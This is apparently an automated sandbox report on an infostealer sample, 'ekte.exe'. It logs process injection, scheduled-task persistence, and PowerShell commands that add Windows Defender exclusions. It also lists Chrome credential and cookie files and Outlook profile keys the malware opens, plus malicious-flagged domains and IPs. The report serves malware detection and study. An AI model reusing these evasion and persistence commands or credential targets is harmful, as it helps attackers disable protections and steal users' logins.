            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtNotifyChangeKey: Direct from: 0x774D0F92
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryAttributesFile: Direct from: 0x774CFE7E
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetTimer: Direct from: 0x774E98D5
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQuerySystemInformation: Direct from: 0x774CFDD2
            Source: C:\Users\user\Desktop\ekte.exeMemory written: C:\Users\user\Desktop\ekte.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory written: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: NULL target: C:\Users\user\Desktop\ekte.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeThread APC queued: target process: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\Desktop\ekte.exeQueries volume information: C:\Users\user\Desktop\ekte.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeQueries volume information: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\findstr.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\zjplj4.zip VolumeInformation
            Source: C:\Windows\SysWOW64\findstr.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E88B90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,19_2_61E88B90
            Source: C:\Users\user\Desktop\ekte.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\findstr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\findstr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\findstr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
            Source: C:\Windows\SysWOW64\findstr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

            Remote Access Functionality

            Source: Yara match; File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E29157 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,19_2_61E29157
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E290EA sqlite3_bind_zeroblob,sqlite3_mutex_leave,19_2_61E290EA
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E290B9 sqlite3_bind_null,sqlite3_mutex_leave,19_2_61E290B9
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E29093 sqlite3_bind_int,sqlite3_bind_int64,19_2_61E29093
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E29044 sqlite3_bind_int64,sqlite3_mutex_leave,19_2_61E29044
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E2923E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,19_2_61E2923E
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E03568 sqlite3_bind_parameter_name,19_2_61E03568
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E03556 sqlite3_bind_parameter_count,19_2_61E03556
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E13A33 sqlite3_bind_parameter_index,19_2_61E13A33
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E16CEE sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,19_2_61E16CEE
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E28FDF sqlite3_bind_double,sqlite3_mutex_leave,19_2_61E28FDF
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E28FB8 sqlite3_bind_text16,19_2_61E28FB8
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E28F4B sqlite3_bind_text64,19_2_61E28F4B
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E28F24 sqlite3_bind_text,19_2_61E28F24
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E28EDD sqlite3_bind_blob64,19_2_61E28EDD
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E28EB6 sqlite3_mutex_leave,sqlite3_bind_blob,19_2_61E28EB6
            Source: C:\Windows\SysWOW64\findstr.exe; Code function: 19_2_61E16EBE sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,19_2_61E16EBE
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 312 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 16 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Scheduled Task/Job | 4 Obfuscated Files or Information | NTDS | 12 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior graph (image not reproduced): ID 1538477, sample ekte.exe, start date 21/10/2024, architecture WINDOWS, score 100

            Source | Detection | Scanner | Label | Link
            ekte.exe | 63% | ReversingLabs | Win32.Infostealer.Generic |
            ekte.exe | 100% | Avira | TR/Kryptik.oucnm |
            ekte.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe | 100% | Avira | TR/Kryptik.oucnm |
            C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe | 63% | ReversingLabs | Win32.Infostealer.Generic |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe |
            http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
            http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
            https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
            https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe |
            http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe |
                                                                              unknown
                                                                              http://ocsp.entrust.net0Dekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameekte.exe, 00000000.00000002.376498845.000000000290A000.00000004.00000800.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409956396.00000000023BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://secure.comodo.com/CPS0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://crl.entrust.net/2048ca.crl0ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.sqlite.org/copyright.html.findstr.exe, 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
IP              Domain                  Country        ASN    ASN Name              Malicious
162.0.238.246   www.guldeu.xyz          Canada         22612  NAMECHEAP-NETUS       true
15.197.148.33   childlesscatlady.today  United States  7430   TANDEMUS              true
45.33.6.223     www.sqlite.org          United States  63949  LINODE-APLinodeLLCUS  false
185.174.173.22  rockbull.pro            Ukraine        21100  ITLDC-NLUA            true
3.33.130.190    deikamalaharris.info    United States  8987   AMAZONEXPANSIONGB     true
